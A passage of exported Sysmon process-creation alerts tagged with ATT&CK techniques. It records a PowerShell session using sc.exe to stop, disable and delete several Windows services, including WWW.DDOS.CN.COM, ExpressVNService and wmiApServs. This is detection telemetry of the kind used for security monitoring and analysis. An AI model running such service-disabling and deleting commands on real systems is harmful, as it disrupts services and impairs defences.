(WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.073",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.758 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c5592100} +ProcessId: 7740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.762148300Z"",""eventRecordID"":""2740"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.758\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c5592100}\r\nProcessId: 7740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.758"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010c5592100}"",""processId"":""7740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.061",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.740 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010d4582100} +ProcessId: 736 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ExpressVNService Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config ExpressVNService Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.743521700Z"",""eventRecordID"":""2739"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.740\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010d4582100}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config ExpressVNService Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.740"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010d4582100}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config ExpressVNService Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.015",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.709 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010f9562100} +ProcessId: 1628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.712010400Z"",""eventRecordID"":""2737"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.709\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010f9562100}\r\nProcessId: 1628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.709"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010f9562100}"",""processId"":""1628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.950",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.662 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001014542100} +ProcessId: 1412 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.664839400Z"",""eventRecordID"":""2734"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.662\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001014542100}\r\nProcessId: 1412\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.662"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001014542100}"",""processId"":""1412"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.922",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.629 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001061522100} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.632326400Z"",""eventRecordID"":""2732"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.629\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001061522100}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.629"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001061522100}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.900",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.614 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00109a512100} +ProcessId: 2936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.617110800Z"",""eventRecordID"":""2731"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.614\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00109a512100}\r\nProcessId: 2936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.614"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00109a512100}"",""processId"":""2936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.839",8,"ATT&CK T1489: Stop 